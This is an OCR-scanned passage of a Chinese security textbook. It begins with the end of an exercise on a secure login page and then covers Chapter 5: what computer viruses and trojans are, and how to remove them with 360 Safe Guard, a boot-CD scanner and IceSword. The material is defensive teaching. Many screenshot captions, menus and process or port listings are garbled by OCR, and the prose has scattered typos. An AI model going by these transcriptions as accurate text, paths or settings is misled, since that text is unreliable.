录 检 验 页 面 Checklogin. asp, 发 布 系统 的 主 功能 界面 的 页 面 命名 为 main. asp。 要 求 编程 实 
现 以 下 功能 。 

D 只 允许 IP 地 址 以 192. 168 开头 的 用 户 可 以 登录 访问 后 面 发 布 系统 。 

@ 从 userinfo 数据 表 中 提供 用 户 名 和 密码 信息 , 校 验 用 户 的 登录 用 户 名 和 密码 是 否 正 
确 , 若 正确 , 则 自动 跳 转 到 main. asp 页 面 : 若 不 正确 , 则 返回 登录 页 面 。 判 断 过 程 中 ,应 首先 
判断 账户 是 否 被 禁用 ,车 被 禁用 , 则 也 不 允许 登录 。 另外 ,在 判断 处 理 过 程 中 ,还 必须 防止 
SQL 注入 攻击 。 

@ main. asp 页 面 和 其 他 所 有 后 台 功 能 性 页 面 .只 能 由 经 过 身份 验证 且 验 证 通过 的 合法 
用 户 才能 访问 ,不 允许 非法 用 户 直 接 访 问 。 
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第 5 章 病毒 与 木马 的 安全 防范 


本 章 主要 介绍 病毒 与 木马 的 安全 防范 和 清除 方法 。 
5.1 病毒 与 木马 简介 


1. 计算 机 病毒 的 概念 

1994 年 2 月 18 日 ,我 国正 式 颁布 实施 了 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 
例 》, 该 条 例 的 第 二 十 八条 对 计算 机 病毒 进行 了 法 律 性 和 权威 性 的 定义 ,明确 指出 :“ 计 算 机 
病毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ,影响 计算 机 使 用 ， 
并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 

根据 这 个 定义 可 见 , 计 算 机 病毒 是 一 种 计算 机 程序 , 它 不 仅 能 破坏 计算 机 系统 ,而 且 还 
能 够 传播 感染 其 他 的 计算 机 系统 。 计 算 机 病毒 具有 以 下 4 个 基本 特征 。 

(1) 传染 性 

传染 性 是 计算 机 病毒 通过 复制 自己 来 传播 感染 其 他 计算 机 程序 的 能 力 。 对 于 文件 型 病 
毒 ,可 执行 程序 是 其 存在 的 宿主 ,也 通过 感染 可 执行 程序 来 获得 自身 程序 被 执行 的 机 会 ,从 
而 达到 夺取 计算 机 系统 控制 权 的 目的 。 对 于 蠕虫 病毒 , 除 可 执行 文件 以 外 ,所 有 与 网 页 相关 
的 文件 (各 种 图 片 文件 .各 种 脚本 文件 ,Flash 动画 等 ) 都 可 能 成 为 被 感染 的 对 象 。 

我 国 计 算 机 病毒 主要 通过 电子 邮件 、 网 页 下 载 或 浏览 ,局域网 和 移动 存储 介质 等 途径 
传播 。 

(2) 隐蔽 性 

为 更 好 地 保护 自己 并 能 长 期 潜伏 下 来 ,计算 机 病毒 都 具有 隐蔽 性 。 病 毒 程序 具有 很 高 
的 编程 技巧 .代码 短小 精 悍 , 通 常 只 有 几 百 字 节 或 几 KB, 这 样 更 容易 嵌入 被 感染 的 程序 文 
件 中 而 不 易 被 发 觉 。 

(3) 潜伏 性 

计算 机 病毒 感染 其 他 计算 机 程序 或 其 他 用 户 的 计算 机 系统 后 ,并 不 会 立即 发 作 进行 破 
坏 活 动 ,而 是 悄悄 潜伏 下 来 ,以 实现 长 期 传播 感染 更 多 的 计算 机 系统 ,只 有 到 了 病毒 设计 者 
预 设 的 发 作 时 间或 满足 预 设 的 触发 条 件 时 ,计算 机 病毒 才 会 开始 进行 破坏 活动 。 

(4) 破坏 性 

计算 机 病毒 都 存在 不 同 程度 的 破坏 性 ,根据 计算 机 病毒 对 系统 造成 的 破坏 程度 ,可 将 计 
算 机 病毒 分 为 良性 病毒 和 恶性 病毒 两 大 类 。 

良性 病毒 在 发 作 时 一 般 显示 一 些 信息 表明 自己 的 存在 ,不 会 对 用 户 数据 进行 破坏 ,这 类 


病毒 的 编写 者 主要 是 想 表现 和 展示 一 下 自己 的 编程 能 力 。 和 良性 病毒 由 于 会 占用 计算 机 系统 
的 资源 ,因此 也 会 影响 计算 机 的 运行 速度 和 干扰 用 户 的 正常 操作 使 用 , 重 者 也 会 导致 计算 机 
系统 的 崩溃 。 良 性 病毒 在 病毒 发 展 史 的 早期 较 多 ,现在 较 少 ,目前 的 病毒 大 多 是 恶性 病毒 ， 
具有 明显 的 趋 利 特征 。 

恶性 病毒 有 明确 的 目的 ,文件 型 恶性 病毒 在 发 作 时 通常 会 破坏 数据 删除 文件 ,加密 磁 
盘 或 者 格式 化 磁盘 ,对 数据 安全 带 来 严重 的 安全 威胁 。 曾 经 暴发 的 CIH 病毒 ,还 能 清除 计 
算 机 硬件 CMOS 中 的 数据 信息 ,造成 计算 机 系统 的 彻底 瘫痪 。 目 前 流行 的 网 络 蠕虫 病毒 ， 
在 攻击 扫描 过 程 中 会 发 送 大 量 的 报 文 ,造成 网 络 的 阻塞 和 竣 疾 ,因此 ,蠕虫 病毒 除了 对 文件 
具有 破坏 性 以 外 ,对 用 户主 机 所 在 的 网 络 也 具有 破坏 性 ,造成 网 络 阻塞 不 可 用 。 比 如 ARP 
病毒 ,一 个 网 段 只 要 有 一 、 二 台 计 算 机 感染 ARP 病毒 , 则 整个 网 段 就 会 因 网 络 阻塞 而 变 得 
上 网 速度 极 慢 , 甚 至 根本 无 法 访问 。 

对 于 计算 机 病毒 的 分 类 ,大 体 可 分 为 引导 扇 区 型 病毒 文件 型 病毒 、 宏 病毒 、 脚 本 病毒 、 
蠕虫 病毒 和 木马 型 病毒 。 

引导 扇 区 型 病毒 主要 在 DOS 操作 系统 时 代 比 较 流 型 ,目前 已 少见 。 

宏 病 毒 感染 的 文件 对 象 是 Office 类 文件 ,是 利用 Office 支持 的 VBA 语言 编写 的 ,通过 
宏 定 义 和 Office 系统 支持 的 各 类 自动 运行 宏 来 实现 传播 .感染 和 破坏 。 

脚本 病毒 利用 脚本 语言 (如 VBScript, JavaScript) 所 编写 的 恶意 代码 。 这 类 病毒 一 般 带 
有 广告 性 质 ,会 修改 IE 首页 地 址 ,修改 注册 表 的 相关 设置 等 ,甚至 自动 从 木马 下 载 站 点 ,下 
载 安装 大 量 的 木马 在 用 户 的 计算 机 上 。 随 着 网 页 挂 马 方式 的 流行 ,脚本 类 病毒 呈 明 显 上 升 
趋势 。 脚 本 类 病毒 的 变种 速度 更 快 .灵活 度 更 高 , 且 通 常 都 是 利用 多 种 漏洞 ,防范 难度 更 大 。 

蠕虫 病毒 是 一 种 通过 网 络 或 移动 存储 介质 ,并 借助 系统 漏洞 进行 传播 的 恶性 病毒 。 一 
般 不 利用 文件 寄生 ,以 独立 的 程序 文件 存在 ,其 传播 感染 目标 是 因特网 中 的 所 有 计算 机 , 具 
有 极 强 的 破坏 能 力 。 蠕 虫 病 毒 的 主要 破坏 方式 是 大 量 复 制 自身 或 发 送 大 量 的 扫描 攻击 报 
文 , 然 后 在 网 络 中 传播 ,严重 占用 网 络 资源 ,最 终 导致 网 路 的 严重 阻塞 和 瘫痪 ,使 网 络 不 可 
用 。 例 如 ,SQL 蠕虫 王 病毒 .ARP 病毒 等 ,目前 这 类 病毒 非常 多 ,蠕虫 病毒 是 目前 病毒 的 主 
流 病毒 之 一 ,其 次 是 木马 类 病毒 。 

木马 型 病毒 是 病毒 的 一 种 特例 ,属于 后 门 (Backdoor) 型 病毒 。 

2. 木马 的 概念 

木马 (Trojan Horse) 是 特洛伊 木马 的 简称 .来源 于 古 希 腊 传 说 (木马 屠城 记 》。 和 希腊 军 
围攻 特洛伊 城 , 久 攻 不 下 ,于 是 伴 装 撤退 ,在 撤退 时 ,遗留 下 一 具 巨 大 的 中 空 木 马 ,特洛伊 人 
将 其 作为 战利品 , 拉 回 城内 。 晚 上 ,整个 特洛伊 城 都 处 于 欢 庆 之 中 。 夜 深信 静 之 际 ,木马 腹 
中 躲藏 的 希腊 士兵 打开 城 门 ,里 应 外 合 , 一 举 攻破 了 特洛伊 城 。 现 今 ,人 们 就 用 特洛伊 木马 
来 指 具 有 欺骗 性 ,并 可 开启 后 门 的 恶意 计算 机 程序 。 木 马 程序 通过 网 络 , 可 远程 控制 用 户 的 
计算 机 系统 ,窃取 用 户 的 数据 资料 ,给 用 户主 机 的 安全 带 来 严重 的 威胁 。 

木马 与 普通 病毒 的 主要 区 别 在 于 木马 不 具备 传染 性 ,隐蔽 性 和 潜伏 性 更 突出 。 普 通病 
毒 主要 是 破坏 数据 ,蠕虫 病毒 主要 是 阻塞 网 络 ,而 木马 病毒 则 是 窃取 用 户 的 数据 信息 ,比如 
网 银 账 号 和 密码 、 网 络 游戏 的 账号 和 密码 等 ,总体 上 呈现 出 一 种 趋 利 的 特征 。 

木马 程序 由 服务 器 端 和 客户 端 两 部 分 组 成 ,属于 典型 的 CCClient)/SCServer) 应 用 程 
序 。 黑 客 端 运行 的 是 木马 的 客户 端 程序 ,被 攻击 端 运行 的 是 木马 的 服务 器 端 程序 。 服 务 器 
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端 程序 会 悄悄 开启 后 门 端口 ,以 供 客户 端 程序 登录 连接 服务 器 端 ,实现 对 被 控制 端的 远程 
控制 。 
目前 木马 性 质 的 病毒 越 来 越 多 , 比较 著名 的 有 灰 铝 子 木马 、 网 游 大 盗 .AV 终结 者 等 。 


5.2 使 用 360 安全 卫士 查 杀 木马 


360 安全 卫士 的 诞生 ,给 木马 和 恶意 插件 的 清除 带 来 了 福音 。 现 在 预防 和 清除 木马 和 
恶意 插件 变 得 相对 轻松 多 了 。 本 节 简 要 介绍 使 用 360 安全 卫士 查 杀 木 马 与 清除 恶意 插件 的 
方法 。 

1. 获取 与 安装 360 安全 卫士 

360 安全 卫士 为 免费 使 用 软件 ,可 从 360 的 官方 网 站 (www. 360. cn) 下 载 获得 。 所 下 载 
得 到 的 inst. exe 为 在 线 安装 程序 。 在 运行 inst. exe 安装 程序 时 ,要 保持 网 络 的 畅通 ,安装 程 
序 将 在 线 从 360 官方 服务 器 下 载 并 安装 360 安全 卫士 。 

2. 使 用 360 安全 卫士 

(1) 对 计算 机 安全 进行 体检 

利用 360 安全 卫士 对 计算 机 进行 体检 ,可 检查 出 目前 计算 机 系统 的 安全 程度 和 得 分 ,并 
给 出 不 安全 的 因素 及 解决 方案 。 对 计算 机 安全 进行 体检 扫描 的 界面 如 图 5. 1 所 示 。 


Q 360 安 全 卫士 73 fb 论坛 一口 x 
2 pany O BE K. usi 
=M uma AU RE BES RISK z3 


| ee aean a T T 
电脑 体检 | 查 杀 木马 | 清理 插 件 修复 漏洞 清理 垃圾 “ 清理 病 扩 系统 修复 高 级 工具 ra 


正在 进行 电脑 体检 ， 请 稍 候 …'， 人 9 7 分 术 马 防火 墙 未 开启 
a 强烈 建议 您 开启 [gg J 
正在 体检 第 31 项 检测 要 评 新 件 [WebEx 相 关 宦 块 ] S| 不 纪 防火 增 是 全 于 第 一 吉 基 于 去 安全 的 专用 
RLAR C4) - 推荐 修复 这 些 项 目 于 白 冲 木马 入 侵 的 防火 墙 ， 能 妨 全 面 抵 贸 各 
ie A mam. 
O 您 有 118 天 未 进行 全 盆 椒 马 扫 朱 了 
O 发 现 您 有 软件 需要 更 新 prap Daan 
O 发 现 修 的 系统 中 存在 垃 要 文件 担心 电脑 人 被 入 侵 ? 使 用 漏洞 修复 | 
- 系统 格 时 文件 ( 251 个 文件 共 35.2MB ) 担心 电脑 被 人 攻击 了 使 用 木马 防火 墙 


电脑 反应 越 来 越 慢 ? 使 用 清理 垃圾 


-无效 的 快 殷 方 式 ( 3 个 文件 RKB) MESDHE? — 使 用 36033 


O 以 下 程序 可 以 禁止 自动 自动 以 加 快 开机 速度 
- 微软 Office 多 语言 支持 官方 


+ 


SOETERS : 不 查 不 说 的 话 
- RUMENA RRASA 
i 开发 小 组 关于 360 扣 扣 保 禁 功 能 的 说 明 
- Adobe Reader 局 动 加 回程 序 盾 讯 网 公然 担 造 ' 盗 基 含 子 " 假 新 闻 
- Adobe 同 染 器 和 Acrobat 产 品 管理 器 | EEE TERINA, RET 
主 程序 版 本 : 73.02001 ”备用 木马 库 : 2010-11-08 O 已 成 功 尝 接 至 360 云 安全 中 心 


图 5.1 利用 360 安全 卫士 对 计算 机 进行 体检 


在 如 图 5. 1 所 示 的 界面 中 . 单 击 “ 木 马 防火 墙 未 开启 ”提示 旁边 的 “开启 ”按钮 ,可 开启 木 
马 防火 墙 ,防止 木马 对 计算 机 系统 的 攻击 入 侵 。 
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(2) 查 杀 木马 

利用 查 杀 木马 功能 ,可 对 计算 机 系统 进行 全 面 的 木马 扫描 检查 和 清除 ,建议 用 户 每 隔 一 
段 时 间 查 杀 扫 描 一 次 , 查 杀 木马 的 功能 界面 如 图 5.2 所 示 。360 提供 了 快速 扫描 ,全盘 扫描 
和 自 定 义 扫描 3 种 方式 供用 户 选择 。 


Q 360 实 全 卫士 7.3 求助 论坛 eati 
G aa = — 
e. pmm O = x. se 
M | 本 马 防火 墙 #5 网 后 ë BZS sneg a 
电脑 体检 “| SAFI | 清理 插件 — SRA | Gmm — RE 系统 修复 | STIA | PEN 


@ 上 次 扫描 时 间 是 119 天 前 ,未 发 现 本 机 存在 木马 程序 。 


全 新 双 引擎 一 3 亿 用 户 的 选择 ! 用 户 量 最 多 ， 查 杀 合力 超 强 ! O 对 引擎 查 杀 木马 已 开局 


云 安全 : 超过 3 亿 用 户 ,秒杀 数 亿 木马 
局 发 式 : 智能 分 析 技 术 ， 查 杀 未 知 木 马 
Q) wes as 
扫描 系统 内 存 、 局 动 对 象 等 关键 位 置 ， 速 度 较 快 


¿$ XRS (24) 
一 = 修 可 以 在 这 里 查看 和 恢复 被 处 理 的 文件 
全 盘 扫 描 
| BERRO BWNRRASNA ETRE 
篇 已 信任 文件 (0) 
修 可 以 在 这 里 应 加 您 认为 安全 的 文件 
上 自 定义 扫描 云 安全 i 
š O 云 安全 计 其 (2) 
poz] L 悠 可 以 在 这 里 查看 已 上 报 的 可 疑 文件 
用 户 隐 脱 保护 承诺 
主 程序 版 本 ;7.3.0.2001 “备用 林 马 库 : 20101100 “检查 更 新 O O 已 所 th 注 按 至 360 云 安全 中 心 


图 5.2 360 查 杀 木马 的 功能 界面 


(3) 清理 插件 

利用 该 项 功能 ,可 扫描 检查 系统 存在 的 插件 ,并 给 出 是 否 清除 的 建议 ,供用 户 选 择 是 否 
清除 。 对 于 恶 评 插件 会 单独 列 出 。 清 除 插件 的 功能 界面 如 图 5. 3 所 示 。 

(4) 修复 漏洞 

利用 漏洞 修复 功能 ,可 实现 自动 扫描 检查 当前 计算 机 系统 存在 的 漏洞 ,并 自动 到 相应 软 
件 的 官方 发 布 网 站 下 载 和 安装 漏洞 的 修复 补丁 。 

(5) 清理 垃圾 

利用 该 项 功能 ,可 实现 对 系统 临时 文件 .系统 缓存 文件 .无 效 的 快捷 方式 等 无 用 文件 的 
清除 ,以 释放 磁盘 空间 。 

(6) 清理 痕迹 

使 用 该 功能 项 ,可 对 用 户 的 上 网 历史 记录 进行 清除 。 

(7) 系统 修复 

木马 或 病毒 人 侵 计算 机 系统 后 ,通常 会 对 下 浏览 器 ,注册 表 、 域 名 解析 文件 ,文件 关联 
等 进行 修改 。360 提供 的 系统 修复 功能 ,可 实现 全 面 的 修复 处 理 , 让 其 恢复 原状 。 系 统 修复 
界面 如 图 5. 4 所 示 。 
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第 5 章 ， 病毒 与 木马 的 安全 防 志 


求助 论坛 


E 


O FRSE. SRA 38 球拍 件 ， Xp 1 BABW URNE? ZRATEARE CIRIO) 
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主 程序 版 本 ; 7.3.0,2001 ”备用 木马 库 : 2010-11-08 ”检查 更 新 


O 已 成 功 连 按 至 360 云 安全 中 心 


图 5.3 360 清理 插件 的 功能 界面 
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主 程序 版 本 : 7.3.0.2001 ”备用 木马 库 : 2010-11-08 ”检查 更 新 O CHERERE Pù 


图 5. 4 


系统 修复 界面 
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(8) 高 级 工具 
在 高 级 工具 栏目 中 提供 了 一 系列 对 系统 安全 、 系 统 故障 诊断 或 优化 系统 运行 速度 的 实 
用 工具 ,如 图 5.5 所 示 。 用 户 可 根据 需要 运行 所 需 的 实用 工具 。 下 面 对 “ 修 复 网 络 (LSP)” 


功能 作 简 要 介绍 。 


9 360 安 全 卫士 73 3h 论坛 L — D x 
-_ — 
FP K E E: aa 外 
EM 本 马 防火 堵 — 杀毒 同 后 。。 防盗 号 。 软件 管家 
eSt | EAFA Weme SARA WD ARME | 系统 修复 高 级 T 具 | wah] 
提供 了 多 种 实用 工具 ， 有 针对 性 的 帮 您 解 块 电脑 问题 ， 提 高 电 及 速度 ? 关切 央视 图 | 
实用 工具 
= = 
m a a g O 3 
FNE FARRE anses 强力 部 可 软件 Wasa 网 络 连 接 查看 器 | 
| 
E Ə = | 
amon BARKS WEMAS | 
360 安 全 产品 | 
go ë | 
36038 360 安 全 浏览 器 
J 
主 程序 版 本 : 7.30.2001 ”备用 木马 库 ; 2010-11-09 ”检查 更 新 克己 成 功 连 振 至 360 云 安全 中 心 


图 5.5 高 级 实用 工具 


Windows 的 网 络 连接 可 以 由 称 为 “分 层 服务 提供 商 (LSP) ”的 机 制 进行 扩展 ,但 这 种 扩 
展 也 经 常 被 恶意 软件 利用 ,通过 劫持 LSP 协议 ,干扰 用 户 的 正常 上 网 。2010 年 2 月 2 日 ， 
Windows 7 和 Vista 用 户 陆 续 出 现 以 下 现象 。 

系统 启动 时 ,360 安全 卫士 的 拦截 提示 框 提示 有 进程 将 要 修改 网 络 分 层 协议 ,提示 窗口 
很 快 就 消失 了 ,360 自动 选择 了 默认 的 阻止 动作 ,之 后 操作 系统 提示 Windows 的 通信 端口 
初始 化 失败 ,与 网 络 相关 的 服务 和 应 用 全 部 无 法 正常 启动 ,重启 系统 故障 依旧 。 

当时 360 安全 卫士 还 没有 提供 “修复 网 络 (LSP) ”的 功能 ,出 现 该 类 攻击 之 后 , 才 新 增 了 
该 功能 。 利 用 该 项 功能 ,就 可 一 键 修复 该 类 网 络 故障 。 

另外 ,也 可 在 命令 行 分 别 执行 “sfc /ScanNow” 和 “netsh winsock reset” 命 令 来 进行 修复 
处 理 , 修 复 后 重启 系统 即 可 。 

(9) 木马 防火 墙 

在 360 安全 卫士 项 部 的 平面 工具 栏 中 , 单 击 “ 木 马 防 火 墙 ”按钮 可 切换 到 对 木马 防火 墙 
的 详细 设置 界面 ,如 图 5. 6 所 示 。 用 户 可 根据 需要 有 选择 性 地 开启 。 

(10) 杀毒 

该 工具 按钮 主要 用 于 启动 360 杀毒 软件 ,来 实现 对 系统 的 杀 病 毒 扫描 。360 杀毒 软件 
也 是 360 公司 推出 的 一 款 免费 的 杀 病 毒 软件 。 
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图 5.6 木马 防火 墙 设置 


(11) 网 盾 

利用 360 网 盾 可 实现 对 用 户 上 网 的 全 方位 的 安全 保护 ,提供 了 如 拦截 欺诈 网 站 ,拦截 木 
马 网 站 ,自动 标识 百度 ,谷歌 等 搜索 结果 网 站 的 危险 程度 和 欺诈 钓鱼 网 站 ,浏览 器 修复 ,过滤 
广告 等 非常 实用 的 功能 ,其 主 界面 如 图 5. 7 所 示 。 
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图 5.7 360 网 盾 主 界面 
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360 安全 卫士 是 一 款 能 全 方位 抵御 木马 病毒 的 安全 保护 软件 ,有 了 它 , 对 木马 病毒 的 防 
御 和 清除 就 变 得 简单 多 了 。 


5.3 使 用 光盘 启动 查 杀 病毒 与 木马 


在 实际 使 用 中 ,通常 会 遇 到 杀 病 毒 软件 能 扫描 检测 到 病毒 ,但 无 法 彻底 清除 病毒 ,甚至 
杀 病 毒 软件 都 被 病毒 (AV 类 病毒 ) 破 坏 无 法 正常 运行 的 情况 ,这 时 如 果 360 安全 卫士 也 无 
法 成 功 清除 该 病毒 ,可 从 瑞星 官方 网 站 下 载 * 瑞 星 2011 引导 杀毒 光盘 映像 "文件 ,将 下 载 得 
到 的 光盘 镜像 文件 linux. iso, 使 用 光盘 刻录 软件 刻 成 光盘 ,然后 利用 该 光盘 引导 计算 机 系 
统 , 进 入 到 基于 Linux 内 核 的 瑞星 杀 病 毒 界面 ,如 图 5. 8 所 示 。 在 该 界面 中 ,就 可 对 感染 病 
毒 或 木马 的 计算 机 系统 进行 全 盘 扫 描 查 杀 。 


B ”采用 光盘 直接 引导 进入 的 基于 Linux 内 核 的 杀 病 毒 界 面 


由 于 这 种 查 杀 方式 是 利用 第 三 方 操作 系统 进行 查 杀 的 ,病毒 程序 没有 运行 ,没有 获得 计 
算 机 的 控制 权 ,清除 这 类 顽固 病毒 或 木马 比较 有 效 。 


5.4 病毒 与 木马 的 手动 清除 


本 节 介绍 几 个 手动 清除 病毒 或 木马 常用 的 辅助 工具 。 
5.4.1 使 用 IceSword 检查 与 终止 进程 


使 用 IceSword( 冰 刃 , 斩 断 黑 手 的 利刃 ) 工 具 软 件 ,可 扫描 检查 出 隐藏 进程 .异常 进程 ， 
并 具有 强制 结束 进程 和 同时 终止 多 个 进程 的 功能 ,这 一 点 ,对 于 终止 采用 双 进 程 互相 监视 保 
护 的 病毒 或 木马 进程 特别 有 效 。 

1. 获取 并 安装 lceSword 软件 

IceSword 软件 可 访问 http://mail. uste. edu. cn/ 一 jfpan/ 地 址 下 载 获 取 , 解 压 后 直接 运 
行 解压 目录 中 的 IceSword. exe 文件 , 即 可 启动 该 软件 ,其 主 界面 如 图 5.9 所 示 。 

为 防止 AV 类 病毒 阻止 IceSword 软件 的 启动 ,IceSword 软件 主 窗口 的 标题 是 随机 产 
生 的 。 

2. lceSword 软件 的 使 用 

(1) 进程 管理 

在 IceSword 主 界面 左 侧 的 工具 栏 中 , 单 击 “进程 ”按钮 ,将 查询 显示 出 当前 正在 运行 的 
进程 ,包括 隐藏 运行 的 进程 ,如 图 5. 10 所 示 。 

对 于 怀疑 是 病毒 或 木马 的 异常 进程 ,将 以 红色 显示 。 另 外 ,用 户 也 可 根据 自己 的 经 验 ， 
通过 查看 进程 列表 来 判断 哪些 是 异常 进程 。 可 右 击 单个 的 异常 进程 ,在 弹出 的 菜单 中 选择 
“结束 进程 选项 , 即 可 强制 结束 该 进程 的 运行 。 若 选择 “模块 信息 ?选项 , 则 可 查看 该 进程 所 
130 


TEE ME Gw NN HD 
l- xs u O) 
x 
m 
2 Copyright 20042007 pif {USTC) 
=] IceSword 1.22 
neme 
全 
Bs 
e 
Bs 
4k. 
sr 
ið http://pjf.blogcn.com 
~ F| 
注册 表 
ED 


图 5.9 IceSword 主 界面 


调用 的 动态 链接 库 信息 ,如 图 5. 11 所 示 。 在 结束 病毒 或 木马 进程 之 前 ,利用 该 项 功能 可 查 
看 病毒 或 木马 进程 所 调用 的 或 与 之 相关 的 动态 链接 库 信息 。 


152 Capro an Feo rt Neb Wiway Sewa. 
CHWINDOWSIeystemGztbosvcgen exe 
C:\Program Fiesi MBCHINA | WebProtectiWPService.exe 


sË sb osl- Fu Lp im na rok: 


图 5. 10 进程 查看 与 管理 


如 果 一 个 进程 被 结束 后 立刻 又 自动 启动 了 ,说 明 该 木马 进程 采用 了 双 进 程 互 相 监控 
互相 保护 技术 。 要 结束 这 类 病毒 或 木马 进程 ,应 找到 这 两 个 进程 ,然后 在 如 图 5. 10 所 示 
的 界面 中 ,采用 按 住 Ctrl 键 不 放 , 结 合用 鼠标 左 键 单 击 的 方式 来 同时 将 这 两 个 进程 选中 ， 
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进程 模块 信息 


Base | Module FileName n 
DEEDODO C:\Program Ples sebesen enori oman dl | xa | 
Program Y l 
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C:\Program Filesy360safe\safemon\AppF Rr. dl 
Ox2800000 CN Wilash10l.ocx 刷新 
em32todbcint， 


0Dx3C70000 C: 

0x3DA0000 e Program Files\Tencent\QQ\Plugn\Com. Tencent. QQ 
C:\WINDOWS}system32\xpsp2res.di 

0x4660000 C:\Program Files\Tencent\QQ\BinjAppMisc. dl a 


0x49C0000 C:\Program Files} Common Fies\Tencent\TXS5OlBn\SS 
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0x7360000 CN 
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OXA$A0000 C:LWINDOWSIMkrosof: apaci 0.50727) 
OxAgEDO00 Ci Spogen Piacon Files\Adobe\ Acrobat} 共计 : 202 
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图 5.11 查看 进程 的 模块 信息 


然后 同时 将 这 两 个 进程 结束 ,就 可 实现 结束 病毒 或 木马 进程 运行 的 目的 ,如 图 5 
所 示 。 

病毒 或 木马 进程 被 结束 后 ,只 需 手 工 删除 进程 对 应 的 文件 , 即 可 实现 对 病毒 或 木马 的 手 
工 清除 。 


|smss.exe 336 C:|WINDOWS}System32\smss.exe 
C lcsss.exe 404 C:\WINDOWS\System32\csrss.exe 

winlogon.exe 428 Ci\WINDOWS\System32\winlogon.exe 
Eservices.exe 472 Ci\WINDOWS\System32\SERVICES. EXE 
eass.exe 484 Ci|WINDOWS\System32\L SASS. EXE 

‘IL.exe 608 Di\ll.exe 
svchost.exe 640 CitWINDOWSI5ystem3ztsvchost,exe 
svehost.exe 692 Ci\WINDOWS\System32svchost.exe 
svehost.exe 756 C:WINDOWSUSystem321svchost,exe 
svchost exe 812 C;IWINDOWSISystem321svchost.exe 
Elspoosv.exe 846 C:\WINDOWS\System32\SPOOLSY.EXE 

是 Eporeree 1064 C:\WINDOWS)EXPLORER. EXE 
(@ Start exe 1208 D:\VStart\vStart.exe 

ctfmon.exe 1244 C:\WINDOWS\System32\ctfmon.exe 
而 IEXPLORE, EXE 1252 C:\Program Files\Internet Exploreryexplore .exe 
(CJinetinfo.exe 1532 Ci\WINDOWS\System32\inetsrv\inetinfo,exe 
Fe 2036 D:\HyperSnapiHprSnapó.exe 

D:\Tencent\QQ.exe 


图 5.12 同时 结束 两 个 互相 保护 的 病毒 进程 


(2) 网 络 服务 端口 查看 

在 工具 栏 中 单 击 “端口 "按钮 ,可 查看 系统 的 网 络 服务 端口 和 对 应 的 网 络 应 用 进程 的 程 
序 名 ,如 图 5. 13 所 示 。 利 用 该 项 功能 可 查看 和 判断 出 木马 的 后 门 服务 端口 和 服务 进程 的 程 
序 名 ,有 助 于 木马 病毒 的 手工 清除 。 

(3) 启动 组 

在 工具 栏 中 单 击 “ 启 动 组 ”按钮 ,可 查看 到 当前 系统 的 自 启动 项 目 。 病 毒 或 木马 为 了 在 
启动 时 获得 对 系统 的 控制 权 , 通 常 都 会 将 启动 程序 添加 到 启动 组 中 。 另 外 ,有 很 多 病毒 或 木 
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CNWINDOWSsraemazyeass.exe 
TCP 0.0.0.0: 1025 0.0.0.0:0 LISTENING 832 C:\Program Fies\RidngiRFWIRavMonD exe 
TCP 192,168.168.15:19  0.0.0.0:0 LISTENING 4 NT OS Kernel 
Tep 0,0,0,0: 445 0.0.0.0:0 LISTENING 4 NT OS Kernel 
TCP 0.0.0.0: 013 0.0.0.0:0 UISTENING 1736 C:\Program Fles\adobe\Flash Meda Server 3 SApache2. iN, 
TCP 0.0.0.0: 6059 0.0.0.0:0 USTEMING 364 ciprog em FiedRiengiRav 
Top 127.0.0.1 : 1039 0.0.00:0 UISTENING 356 CAWINDOWSY 
FIS 0.0.0.0:0 UISTENING 748 CAWINDOWSsyaenüzisvchost exe 
TP 0.00: 80 0000:0 USTENMING 4 NT OS Keel 


s 5 u- rT RD im sa rok: 


“IC 00.00:53 0.0.0.0:0 UISTEMING 1700 CAWINDOWS\system32\drs exe 


图 5.13 网 络 服务 端口 与 服务 进程 查看 


马 会 采用 钩子 技术 或 动 持 技术 , 随 着 IE 浏览 器 (iexplore. exe) 或 Windows 的 资源 管理 器 
(explorer. exe, 文 件 浏览 器 ) 等 系统 标准 服务 进程 的 启动 而 自动 启动 ,这 类 病毒 或 木马 在 启 
动 组 中 一 般 找 不 到 启动 程序 。 

(4) 服务 

在 工具 栏 中 单 击 “ 服 务 ” 按 钮 ,可 查看 和 管理 系统 的 各 项 服务 进程 。 在 要 管理 的 服务 进 
程 上 右 击 ,弹出 的 菜单 中 提供 了 对 进程 的 管理 功能 ,如 停止 服务 、 启 动 服 务 、 设 置 服务 进程 的 
启动 方式 等 ,如 图 5. 14 所 示 。 

(5) BHO 

BHO(Browser Help Objects, 浏 览 器 帮助 对 象 ) 是 实现 了 特定 接口 的 COM 组 件 ,以 浏 
览 器 插件 的 形式 ,可 被 浏览 器 调用 ,用 于 对 浏览 器 (IE 浏览 器 和 文件 浏览 器 ) 界 面 进行 定制 
或 对 用 户 的 浏览 器 操作 行为 进行 监控 或 对 访问 内 容 进 行 分 析 , 功 能 十 分 强大 。 

微软 公司 设计 浏览 器 时 ,已 给 BHO 预 留 了 空间 。 当 浏览 器 启动 时 ,浏览 器 会 首先 到 
HKEY _ LOCAL _ MACHINEN SOFTWARE N Microsoft \ Windows N CurrentVersion \ 
Explorer\Browser Helper Objects 下 查看 是 否 有 注册 的 BHO 插件 的 CLSID, 如 果 有 , 则 分 
别 创建 一 个 实例 ,并 对 BHO 实例 进行 初始 化 ,建立 交互 连接 。 在 浏览 器 工作 的 过 程 中 ， 
BHO 插件 会 接收 到 很 多 事件 ,比如 浏览 新 的 地 址 ,前进 或 后 退 ,生成 新 的 窗口 .浏览 器 退出 
等 ,BHO 可 利用 对 这 些 事件 的 响应 ,实现 与 浏览 器 的 交互 操作 。BHO 实例 只 有 在 创建 它 的 
浏览 器 窗口 销毁 时 才 被 释放 。 

BHO 插件 可 被 文件 浏览 器 加 载 , 若 只 允许 正 浏览 器 加 载 , 则 在 编程 时 对 加 载 者 进行 判 
断 即 可 。 

由 于 BHO 功能 强大 , 且 可 随 着 浏览 器 的 启动 而 自动 启动 运行 ,因此 ,部 分 病毒 或 木马 
也 通常 设计 成 BHO 插件 的 方式 来 运行 。 利 用 IceSword 工具 软件 的 BHO 查看 和 删除 功 
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图 5.14 管理 服务 进程 


能 ,可 实现 对 BHO 插件 的 管理 。 

在 IceSword 工具 栏 中 单 击 BHO 按钮 ,可 查询 当前 系统 的 BHO 插件 及 对 应 的 程序 名 。 
如 图 5.15 所 示 。 若 要 删除 某 个 插件 ,可 右 击 该 BHO 插件 ,在 弹出 的 菜单 中 选择 “删除 ” 选 
项 即 可 。 

